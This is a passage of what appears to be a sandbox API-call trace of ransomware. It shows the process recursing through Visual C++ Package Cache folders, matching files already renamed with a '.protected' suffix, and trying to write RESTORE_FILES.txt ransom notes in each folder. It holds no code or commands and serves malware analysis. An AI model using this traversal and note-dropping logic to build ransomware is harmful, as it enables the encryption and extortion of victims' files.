Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\vcredist_x64.exe.protected") returned 102 [0093.349] StrStrIW (lpFirst="vcredist_x64.exe.protected", lpSrch=".protected") returned=".protected" [0093.349] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.349] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RESTORE_FILES.txt") returned 93 [0093.349] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{3c3aafc8-d898-43ec-998f-965ffdae065a}\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.349] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.349] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017") returned 87 [0093.349] lstrcmpW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2=".") returned 1 [0093.349] lstrcmpW (lpString1="{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017", lpString2="..") returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*") returned 89 [0093.349] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.349] 
wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\.") returned 89 [0093.349] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.349] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\..") returned 90 [0093.349] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.349] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.349] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.349] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages") returned 96 [0093.349] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.349] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.350] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*") returned 98 [0093.350] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.350] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\.") returned 98 [0093.350] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.350] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: 
lpFindFileData=0x295ecb0) returned 1 [0093.350] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\..") returned 99 [0093.350] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.350] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.350] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.350] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.350] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.350] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.350] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.350] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86") returned 117 [0093.350] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2=".") returned 1 [0093.350] lstrcmpW (lpString1="vcRuntimeMinimum_x86", lpString2="..") returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*") returned 119 [0093.351] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\.") returned 119 [0093.351] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.351] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\..") returned 120 [0093.351] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.351] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.351] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\cab1.cab.protected") returned 136 [0093.351] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.351] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 135 [0093.351] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.351] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.351] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\vc_runtimeMinimum_x86.msi.protected") returned 153 [0093.351] StrStrIW (lpFirst="vc_runtimeMinimum_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.351] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.351] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.351] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt") returned 135 [0093.351] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\vcRuntimeMinimum_x86\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\vcruntimeminimum_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.351] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.351] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.352] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.352] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.352] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.352] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.352] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.352] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.352] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.352] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.352] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.353] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{582EA838-9199-3518-A05C-DB09462F68EC}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{582ea838-9199-3518-a05c-db09462f68ec}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.353] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.353] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017") returned 87 [0093.353] lstrcmpW (lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2=".") returned 1 [0093.353] lstrcmpW 
(lpString1="{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017", lpString2="..") returned 1 [0093.354] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*") returned 89 [0093.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.354] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\.") returned 89 [0093.354] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.354] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.354] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\..") returned 90 [0093.354] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.354] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.354] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.354] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages") returned 96 [0093.354] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.354] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.354] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*") returned 98 [0093.354] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.355] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\.") returned 98 [0093.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.355] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.355] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\..") returned 99 [0093.355] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.355] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.355] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.355] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.355] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.355] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.355] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86") returned 120 [0093.355] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0093.355] lstrcmpW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0093.355] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, 
pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*") returned 122 [0093.355] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0x47ba50 [0093.355] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\.") returned 122 [0093.355] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.355] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.355] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\..") returned 123 [0093.355] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.355] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.355] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.355] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\cab1.cab.protected") returned 139 [0093.356] StrStrIW (lpFirst="cab1.cab.protected", lpSrch=".protected") returned=".protected" [0093.356] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.356] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 138 [0093.356] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.356] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.356] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0093.356] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.protected") returned 159 [0093.356] StrStrIW (lpFirst="vc_runtimeAdditional_x86.msi.protected", lpSrch=".protected") returned=".protected" [0093.356] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0093.356] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0093.356] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt") returned 138 [0093.356] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\vcRuntimeAdditional_x86\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\vcruntimeadditional_x86\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.356] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0093.356] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0093.357] 
wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RESTORE_FILES.txt") returned 114 [0093.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\packages\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\packages\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.357] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.357] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.357] StrStrIW (lpFirst="RESTORE_FILES.txt", lpSrch=".protected") returned 0x0 [0093.357] lstrcmpW (lpString1="RESTORE_FILES.txt", lpString2="RESTORE_FILES.txt") returned 0 [0093.357] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0093.357] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0093.357] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RESTORE_FILES.txt") returned 105 [0093.357] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{68306422-7C57-373F-8860-D26CE4BA2A15}v14.10.25017\\RESTORE_FILES.txt" (normalized: "c:\\users\\all users\\package cache\\{68306422-7c57-373f-8860-d26ce4ba2a15}v14.10.25017\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.358] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0093.358] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017") returned 87 [0093.358] lstrcmpW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2=".") returned 1 [0093.358] lstrcmpW (lpString1="{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017", lpString2="..") returned 1 [0093.358] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*") returned 89 [0093.358] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0093.358] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\.") returned 89 [0093.358] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.358] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.358] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\..") returned 90 [0093.358] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.358] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.358] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0093.358] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 
Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages") returned 96 [0093.358] lstrcmpW (lpString1="packages", lpString2=".") returned 1 [0093.359] lstrcmpW (lpString1="packages", lpString2="..") returned 1 [0093.359] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*") returned 98 [0093.359] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x47ba10 [0093.359] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\.") returned 98 [0093.359] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0093.359] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.359] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package Cache\\{8D4F7A6D-6B81-3DC8-9C21-6008E4866727}v14.10.25017\\packages\\..") returned 99 [0093.359] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0093.359] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0093.359] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.359] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Package 